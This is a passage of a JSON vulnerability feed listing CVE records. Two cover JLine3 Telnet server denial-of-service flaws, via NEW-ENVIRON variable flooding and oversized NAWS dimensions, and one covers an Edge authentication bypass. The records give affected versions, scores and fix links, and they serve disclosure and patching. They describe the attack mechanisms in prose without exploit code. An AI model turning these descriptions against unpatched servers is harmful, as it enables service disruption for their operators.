4.0.16, and 4.2.1, the JLine3 Telnet server remote-telnet module does not limit the number of environment variables a client may inject via the Telnet NEW-ENVIRON option, and TelnetIO.readNEVariables() in TelnetIO.java:1127-1180 stores each variable pair in a HashMap held by ConnectionData, allowing an unauthenticated attacker to flood unique variable pairs before the terminating IAC SE byte and exhaust JVM heap memory with an OutOfMemoryError. This issue is fixed in versions 3.30.14, 4.0.16, and 4.2.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"jline","product":"jline3","versions":[{"version":"< 3.30.14","status":"affected"},{"version":">= 4.0.0, < 4.0.16","status":"affected"},{"version":">= 4.1.0, < 4.2.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-400"}]}],"references":[{"url":"https://github.com/jline/jline3/commit/0389f0ee6d0375901b602671ad5dafd4d1d4ee09","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/commit/4ee3a73849ffb9a85ec748e4e8cd8f6d81f84f40","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/commit/934f09e6128cee33c2b13d42b6e859c1ee2d194b","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/pull/2000","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/pull/2001","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/releases/tag/4.0.16","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/releases/tag/4.2.1","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/releases/tag/jline-3.30.14","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/security/advisories/GHSA-47qp-hqvx-6r3f","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-56741","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T22:17:57.317","lastModified":"2026-07-17T22:17:57.317","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"JLine is a Java library for handling console input. Prior to 3.30.14, 4.0.16, and 4.2.1, the JLine3 Telnet server remote-telnet module does not apply an upper bound to terminal dimensions received via the Telnet NAWS option, and TelnetIO.handleNAWS() in TelnetIO.java:856-879 reads client-supplied width and height as 16-bit unsigned integers and passes values such as 65535x65535 to setTerminalGeometry(), allowing an unauthenticated remote attacker to repeatedly alternate values and trigger continuous expensive rendering work that causes CPU exhaustion and denial of service. This issue is fixed in versions 3.30.14, 4.0.16, and 4.2.1."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"jline","product":"jline3","versions":[{"version":"< 3.30.14","status":"affected"},{"version":">= 4.0.0, < 4.0.16","status":"affected"},{"version":">= 4.1.0, < 4.2.1","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-400"}]}],"references":[{"url":"https://github.com/jline/jline3/commit/3ea9cad8699714dc072fade29d36be0d1e23d708","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/commit/733eb353dca7b0ea0252e724445b6defa29c393e","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/commit/86b7ba7801988aadb1a67555629522a71d603bd3","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/pull/2000","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/releases/tag/4.0.16","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/releases/tag/4.2.1","source":"security-advisories@github.com"},{"url":"https://github.com/jline/jline3/security/advisories/GHSA-2r2c-cx56-8933","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-57980","sourceIdentifier":"secure@microsoft.com","published":"2026-07-17T22:17:59.917","lastModified":"2026-07-17T22:17:59.917","vulnStatus":"Received","cveTags":[],"descriptions":[{"lang":"en","value":"Authentication bypass using an alternate path or channel in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform tampering over a network."}],"affected":[{"source":"secure@microsoft.com","affectedData":[{"vendor":"Microsoft","product":"Microsoft Edge (Chromium-based)","versions":[{"version":"1.0.0.0","lessThan":"150.0.4078.80","versionType":"custom","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"secure@microsoft.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5}]},"weaknesses":[{"source":"secure@microsoft.com","type":"Primary","description":[{"lang":"en","value":"CWE-288"}]}],"references":[{"url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57980","source":"secure@microsoft.com"}]}}]}